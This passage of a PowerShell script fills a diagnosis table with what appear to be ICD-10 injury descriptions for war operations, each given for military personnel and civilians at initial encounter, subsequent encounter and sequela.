destruction of aircraft due to accidental detonation of onboard munitions and explosives, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving destruction of aircraft due to accidental detonation of onboard munitions and explosives, civilian","War operations involving destruction of aircraft due to accidental detonation of onboard munitions and explosives, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving destruction of aircraft due to accidental detonation of onboard munitions and explosives, civilian","War operations involving destruction of aircraft due to accidental detonation of onboard munitions and explosives, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving other destruction of aircraft, military personnel","War operations involving other destruction of aircraft, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving other destruction of aircraft, military personnel","War operations involving other destruction of aircraft, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving other destruction of aircraft, military personnel","War operations involving other destruction of aircraft, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving other destruction of aircraft, civilian","War operations involving other destruction of aircraft, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving other destruction of aircraft, civilian","War operations involving other destruction of aircraft, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving other destruction of aircraft, civilian","War operations involving other destruction of aircraft, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving unspecified explosion and fragments, military personnel","War operations involving unspecified explosion and fragments, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving unspecified explosion and fragments, military personnel","War operations involving unspecified explosion and fragments, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving unspecified explosion and fragments, military personnel","War operations involving unspecified explosion and fragments, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving unspecified explosion and fragments, civilian","War operations involving unspecified explosion and fragments, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving unspecified explosion and fragments, civilian","War operations involving unspecified explosion and fragments, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving unspecified explosion and fragments, civilian","War operations involving unspecified explosion and fragments, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of aerial bomb, military personnel","War operations involving explosion of aerial bomb, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of aerial bomb, military personnel","War operations involving explosion of aerial bomb, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of aerial bomb, military personnel","War operations involving explosion of aerial bomb, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of aerial bomb, civilian","War operations involving explosion of aerial bomb, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of aerial bomb, civilian","War operations involving explosion of aerial bomb, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of aerial bomb, civilian","War operations involving explosion of aerial bomb, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of guided missile, military personnel","War operations involving explosion of guided missile, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of guided missile, military personnel","War operations involving explosion of guided missile, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of guided missile, military personnel","War operations involving explosion of guided missile, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of guided missile, civilian","War operations involving explosion of guided missile, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of guided missile, civilian","War operations involving explosion of guided missile, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of guided missile, civilian","War operations involving explosion of guided missile, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of improvised explosive device [IED], military personnel","War operations involving explosion of improvised explosive device [IED], military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of improvised explosive device [IED], military personnel","War operations involving explosion of improvised explosive device [IED], military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of improvised explosive device [IED], military personnel","War operations involving explosion of improvised explosive device [IED], military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of improvised explosive device [IED], civilian","War operations involving explosion of improvised explosive device [IED], civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of improvised explosive device [IED], civilian","War operations involving explosion of improvised explosive device [IED], civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of improvised explosive device [IED], civilian","War operations involving explosion of improvised explosive device [IED], civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving explosion due to accidental detonation and discharge of own munitions or munitions launch device, military personnel","War operations involving explosion due to accidental detonation and discharge of own munitions or munitions launch device, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion due to accidental detonation and discharge of own munitions or munitions launch device, military personnel","War operations involving explosion due to accidental detonation and discharge of own munitions or munitions launch device, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion due to accidental detonation and discharge of own munitions or munitions launch device, military personnel","War operations involving explosion due to accidental detonation and discharge of own munitions or munitions launch device, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving explosion due to accidental detonation and discharge of own munitions or munitions launch device, civilian","War operations involving explosion due to accidental detonation and discharge of own munitions or munitions launch device, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion due to accidental detonation and discharge of own munitions or munitions launch device, civilian","War operations involving explosion due to accidental detonation and discharge of own munitions or munitions launch device, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion due to accidental detonation and discharge of own munitions or munitions launch device, civilian","War operations involving explosion due to accidental detonation and discharge of own munitions or munitions launch device, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving fragments from munitions, military personnel","War operations involving fragments from munitions, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving fragments from munitions, military personnel","War operations involving fragments from munitions, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving fragments from munitions, military personnel","War operations involving fragments from munitions, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving fragments from munitions, civilian","War operations involving fragments from munitions, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving fragments from munitions, civilian","War operations involving fragments from munitions, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving fragments from munitions, civilian","War operations involving fragments from munitions, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving fragments of improvised explosive device [IED], military personnel","War operations involving fragments of improvised explosive device [IED], military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving fragments of improvised explosive device [IED], military personnel","War operations involving fragments of improvised explosive device [IED], military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving fragments of improvised explosive device [IED], military personnel","War operations involving fragments of improvised explosive device [IED], military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving fragments of improvised explosive device [IED], civilian","War operations involving fragments of improvised explosive device [IED], civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving fragments of improvised explosive device [IED], civilian","War operations involving fragments of improvised explosive device [IED], civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving fragments of improvised explosive device [IED], civilian","War operations involving fragments of improvised explosive device [IED], civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving fragments from weapons, military personnel","War operations involving fragments from weapons, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving fragments from weapons, military personnel","War operations involving fragments from weapons, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving fragments from weapons, military personnel","War operations involving fragments from weapons, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving fragments from weapons, civilian","War operations involving fragments from weapons, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving fragments from weapons, civilian","War operations involving fragments from weapons, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving fragments from weapons, civilian","War operations involving fragments from weapons, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving other explosions and fragments, military personnel","War operations involving other explosions and fragments, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving other explosions and fragments, military personnel","War operations involving other explosions and fragments, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving other explosions and fragments, military personnel","War operations involving other explosions and fragments, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving other explosions and fragments, civilian","War operations involving other explosions and fragments, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving other explosions and fragments, civilian","War operations involving other explosions and fragments, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving other explosions and fragments, civilian","War operations involving other explosions and fragments, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving unspecified fire, conflagration and hot substance, military personnel","War operations involving unspecified fire, conflagration and hot substance, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving unspecified fire, conflagration and hot substance, military personnel","War operations involving unspecified fire, conflagration and hot substance, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving unspecified fire, conflagration and hot substance, military personnel","War operations involving unspecified fire, conflagration and hot substance, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving unspecified fire, conflagration and hot substance, civilian","War operations involving unspecified fire, conflagration and hot substance, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving unspecified fire, conflagration and hot substance, civilian","War operations involving unspecified fire, conflagration and hot substance, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving unspecified fire, conflagration and hot substance, civilian","War operations involving unspecified fire, conflagration and hot substance, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving gasoline bomb, military personnel","War operations involving gasoline bomb, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving gasoline bomb, military personnel","War operations involving gasoline bomb, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving gasoline bomb, military personnel","War operations involving gasoline bomb, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving gasoline bomb, civilian","War operations involving gasoline bomb, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving gasoline bomb, civilian","War operations involving gasoline bomb, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving gasoline bomb, civilian","War operations involving gasoline bomb, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving incendiary bullet, military personnel","War operations involving incendiary bullet, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving incendiary bullet, military personnel","War operations involving incendiary bullet, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving incendiary bullet, military personnel","War operations involving incendiary bullet, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving incendiary bullet, civilian","War operations involving incendiary bullet, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving incendiary bullet, civilian","War operations involving incendiary bullet, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving incendiary bullet, civilian","War operations involving incendiary bullet, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving flamethrower, military personnel","War operations involving flamethrower, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving flamethrower, military personnel","War operations involving flamethrower, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving flamethrower, military personnel","War operations involving flamethrower, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving flamethrower, civilian","War operations involving flamethrower, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving flamethrower, civilian","War operations involving flamethrower, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving flamethrower, civilian","War operations involving flamethrower, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving other fires, conflagrations and hot substances, military personnel","War operations involving other fires, conflagrations and hot substances, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving other fires, conflagrations and hot substances, military personnel","War operations involving other fires, conflagrations and hot substances, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving other fires, conflagrations and hot substances, military personnel","War operations involving other fires, conflagrations and hot substances, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving other fires, conflagrations and hot substances, civilian","War operations involving other fires, conflagrations and hot substances, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving other fires, conflagrations and hot substances, civilian","War operations involving other fires, conflagrations and hot substances, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving other fires, conflagrations and hot substances, civilian","War operations involving other fires, conflagrations and hot substances, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving rubber bullets, military personnel","War operations involving rubber bullets, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving rubber bullets, military personnel","War operations involving rubber bullets, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving rubber bullets, military personnel","War operations involving rubber bullets, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving rubber bullets, civilian","War operations involving rubber bullets, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving rubber bullets, civilian","War operations involving rubber bullets, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving rubber bullets, civilian","War operations involving rubber bullets, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving firearms pellets, military personnel","War operations involving firearms pellets, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving firearms pellets, military personnel","War operations involving firearms pellets, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving firearms pellets, military personnel","War operations involving firearms pellets, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving firearms pellets, civilian","War operations involving firearms pellets, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving firearms pellets, civilian","War operations involving firearms pellets, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving firearms pellets, civilian","War operations involving firearms pellets, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving other firearms discharge, military personnel","War operations involving other firearms discharge, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving other firearms discharge, military personnel","War operations involving other firearms discharge, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving other firearms discharge, military personnel","War operations involving other firearms discharge, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving other firearms discharge, civilian","War operations involving other firearms discharge, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving other firearms discharge, civilian","War operations involving other firearms discharge, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving other firearms discharge, civilian","War operations involving other firearms discharge, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving unarmed hand to hand combat, military personnel","War operations involving unarmed hand to hand combat, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving unarmed hand to hand combat, military personnel","War operations involving unarmed hand to hand combat, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving unarmed hand to hand combat, military personnel","War operations involving unarmed hand to hand combat, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving unarmed hand to hand combat, civilian","War operations involving unarmed hand to hand combat, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving unarmed hand to hand combat, civilian","War operations involving unarmed hand to hand combat, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving unarmed hand to hand combat, civilian","War operations involving unarmed hand to hand combat, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving combat using blunt or piercing object, military personnel","War operations involving combat using blunt or piercing object, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving combat using blunt or piercing object, military personnel","War operations involving combat using blunt or piercing object, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving combat using blunt or piercing object, military personnel","War operations involving combat using blunt or piercing object, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving combat using blunt or piercing object, civilian","War operations involving combat using blunt or piercing object, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving combat using blunt or piercing object, civilian","War operations involving combat using blunt or piercing object, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving combat using blunt or piercing object, civilian","War operations involving combat using blunt or piercing object, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving intentional restriction of air and airway, military personnel","War operations involving intentional restriction of air and airway, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving intentional restriction of air and airway, military personnel","War operations involving intentional restriction of air and airway, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving intentional restriction of air and airway, military personnel","War operations involving intentional restriction of air and airway, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving intentional restriction of air and airway, civilian","War operations involving intentional restriction of air and airway, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving intentional restriction of air and airway, civilian","War operations involving intentional restriction of air and airway, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving intentional restriction of air and airway, civilian","War operations involving intentional restriction of air and airway, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving unintentional restriction of air and airway, military personnel","War operations involving unintentional restriction of air and airway, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving unintentional restriction of air and airway, military personnel","War operations involving unintentional restriction of air and airway, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving unintentional restriction of air and airway, military personnel","War operations involving unintentional restriction of air and airway, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving unintentional restriction of air and airway, civilian","War operations involving unintentional restriction of air and airway, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving unintentional restriction of air and airway, civilian","War operations involving unintentional restriction of air and airway, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving unintentional restriction of air and airway, civilian","War operations involving unintentional restriction of air and airway, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving other forms of conventional warfare, military personnel","War operations involving other forms of conventional warfare, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving other forms of conventional warfare, military personnel","War operations involving other forms of conventional warfare, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving other forms of conventional warfare, military personnel","War operations involving other forms of conventional warfare, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving other forms of conventional warfare, civilian","War operations involving other forms of conventional warfare, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving other forms of conventional warfare, civilian","War operations involving other forms of conventional warfare, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving other forms of conventional warfare, civilian","War operations involving other forms of conventional warfare, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving unspecified effect of nuclear weapon, military personnel","War operations involving unspecified effect of nuclear weapon, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving unspecified effect of nuclear weapon, military personnel","War operations involving unspecified effect of nuclear weapon, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving unspecified effect of nuclear weapon, military personnel","War operations involving unspecified effect of nuclear weapon, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving unspecified effect of nuclear weapon, civilian","War operations involving unspecified effect of nuclear weapon, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving unspecified effect of nuclear weapon, civilian","War operations involving unspecified effect of nuclear weapon, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving unspecified effect of nuclear weapon, civilian","War operations involving unspecified effect of nuclear weapon, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving direct blast effect of nuclear weapon, military personnel","War operations involving direct blast effect of nuclear weapon, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving direct blast effect of nuclear weapon, military personnel","War operations involving direct blast effect of nuclear weapon, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving direct blast effect of nuclear weapon, military personnel","War operations involving direct blast effect of nuclear weapon, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving direct blast effect of nuclear weapon, civilian","War operations involving direct blast effect of nuclear weapon, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving direct blast effect of nuclear weapon, civilian","War operations involving direct blast effect of nuclear weapon, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving direct blast effect of nuclear weapon, civilian","War operations involving direct blast effect of nuclear weapon, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving indirect blast effect of nuclear weapon, military personnel","War operations involving indirect blast effect of nuclear weapon, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving indirect blast effect of nuclear weapon, military personnel","War operations involving indirect blast effect of nuclear weapon, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving indirect blast effect of nuclear weapon, military personnel","War operations involving indirect blast effect of nuclear weapon, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving indirect blast effect of nuclear weapon, civilian","War operations involving indirect blast effect of nuclear weapon, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving indirect blast effect of nuclear weapon, civilian","War operations involving indirect blast effect of nuclear weapon, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving indirect blast effect of nuclear weapon, civilian","War operations involving indirect blast effect of nuclear weapon, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving thermal radiation effect of nuclear weapon, military personnel","War operations involving thermal radiation effect of nuclear weapon, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving thermal radiation effect of nuclear weapon, military personnel","War operations involving thermal radiation effect of nuclear weapon, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving thermal radiation effect of nuclear weapon, military personnel","War operations involving thermal radiation effect of nuclear weapon, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving thermal radiation effect of nuclear weapon, civilian","War operations involving thermal radiation effect of nuclear weapon, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving thermal radiation effect of nuclear weapon, civilian","War operations involving thermal radiation effect of nuclear weapon, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving thermal radiation effect of nuclear weapon, civilian","War operations involving thermal radiation effect of nuclear weapon, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operation involving nuclear radiation effects of nuclear weapon, military personnel","War operation involving nuclear radiation effects of nuclear weapon, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operation involving nuclear radiation effects of nuclear weapon, military personnel","War operation involving nuclear radiation effects of nuclear weapon, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operation involving nuclear radiation effects of nuclear weapon, military personnel","War operation involving nuclear radiation effects of nuclear weapon, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operation involving nuclear radiation effects of nuclear weapon, civilian","War operation involving nuclear radiation effects of nuclear weapon, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operation involving nuclear radiation effects of nuclear weapon, civilian","War operation involving nuclear radiation effects of nuclear weapon, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operation involving nuclear radiation effects of nuclear weapon, civilian","War operation involving nuclear radiation effects of nuclear weapon, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operation involving other effects of nuclear weapons, military personnel","War operation involving other effects of nuclear weapons, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operation involving other effects of nuclear weapons, military personnel","War operation involving other effects of nuclear weapons, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operation involving other effects of nuclear weapons, military personnel","War operation involving other effects of nuclear weapons, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operation involving other effects of nuclear weapons, civilian","War operation involving other effects of nuclear weapons, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operation involving other effects of nuclear weapons, civilian","War operation involving other effects of nuclear weapons, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operation involving other effects of nuclear weapons, civilian","War operation involving other effects of nuclear weapons, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving biological weapons, military personnel","War operations involving biological weapons, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving biological weapons, military personnel","War operations involving biological weapons, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving biological weapons, military personnel","War operations involving biological weapons, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving biological weapons, civilian","War operations involving biological weapons, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving biological weapons, civilian","War operations involving biological weapons, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving biological weapons, civilian","War operations involving biological weapons, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving chemical weapons and other forms of unconventional warfare, military personnel","War operations involving chemical weapons and other forms of unconventional warfare, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving chemical weapons and other forms of unconventional warfare, military personnel","War operations involving chemical weapons and other forms of unconventional warfare, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving chemical weapons and other forms of unconventional warfare, military personnel","War operations involving chemical weapons and other forms of unconventional warfare, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving chemical weapons and other forms of unconventional warfare, civilian","War operations involving chemical weapons and other forms of unconventional warfare, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving chemical weapons and other forms of unconventional warfare, civilian","War operations involving chemical weapons and other forms of unconventional warfare, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving chemical weapons and other forms of unconventional warfare, civilian","War operations involving chemical weapons and other forms of unconventional warfare, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Explosion of mine placed during war operations but exploding after cessation of hostilities, military personnel","Explosion of mine placed during war operations but exploding after cessation of hostilities, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Explosion of mine placed during war operations but exploding after cessation of hostilities, military personnel","Explosion of mine placed during war operations but exploding after cessation of hostilities, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Explosion of mine placed during war operations but exploding after cessation of hostilities, military personnel","Explosion of mine placed during war operations but exploding after cessation of hostilities, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Explosion of mine placed during war operations but exploding after cessation of hostilities, civilian","Explosion of mine placed during war operations but exploding after cessation of hostilities, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Explosion of mine placed during war operations but exploding after cessation of hostilities, civilian","Explosion of mine placed during war operations but exploding after cessation of hostilities, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Explosion of mine placed during war operations but exploding after cessation of hostilities, civilian","Explosion of mine placed during war operations but exploding after cessation of hostilities, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Explosion of bomb placed during war operations but exploding after cessation of hostilities, military personnel","Explosion of bomb placed during war operations but exploding after cessation of hostilities, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Explosion of bomb placed during war operations but exploding after cessation of hostilities, military personnel","Explosion of bomb placed during war operations but exploding after cessation of hostilities, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Explosion of bomb placed during war operations but exploding after cessation of hostilities, military personnel","Explosion of bomb placed during war operations but exploding after cessation of hostilities, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Explosion of bomb placed during war operations but exploding after cessation of hostilities, civilian","Explosion of bomb placed during war operations but exploding after cessation of hostilities, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Explosion of bomb placed during war operations but exploding after cessation of hostilities, civilian","Explosion of bomb placed during war operations but exploding after cessation of hostilities, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Explosion of bomb placed during war operations but exploding after cessation of hostilities, civilian","Explosion of bomb placed during war operations but exploding after cessation of hostilities, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Other war operations occurring after cessation of hostilities, military personnel","Other war operations occurring after cessation of hostilities, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Other war operations occurring after cessation of hostilities, military personnel","Other war operations occurring after cessation of hostilities, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other war operations occurring after cessation of hostilities, military personnel","Other war operations occurring after cessation of hostilities, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Other war operations occurring after cessation of hostilities, civilian","Other war operations occurring after cessation of hostilities, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Other war operations occurring after cessation of hostilities, civilian","Other war operations occurring after cessation of hostilities, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other war operations occurring after cessation of hostilities, civilian","Other war operations occurring after cessation of hostilities, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified war operations occurring after cessation of hostilities, military personnel","Unspecified war operations occurring after cessation of hostilities, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified war operations occurring after cessation of hostilities, military personnel","Unspecified war operations occurring after cessation of hostilities, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified war operations occurring after cessation of hostilities, military personnel","Unspecified war operations occurring after cessation of hostilities, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified war operations occurring after cessation of hostilities, civilian","Unspecified war operations occurring after cessation of hostilities, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified war 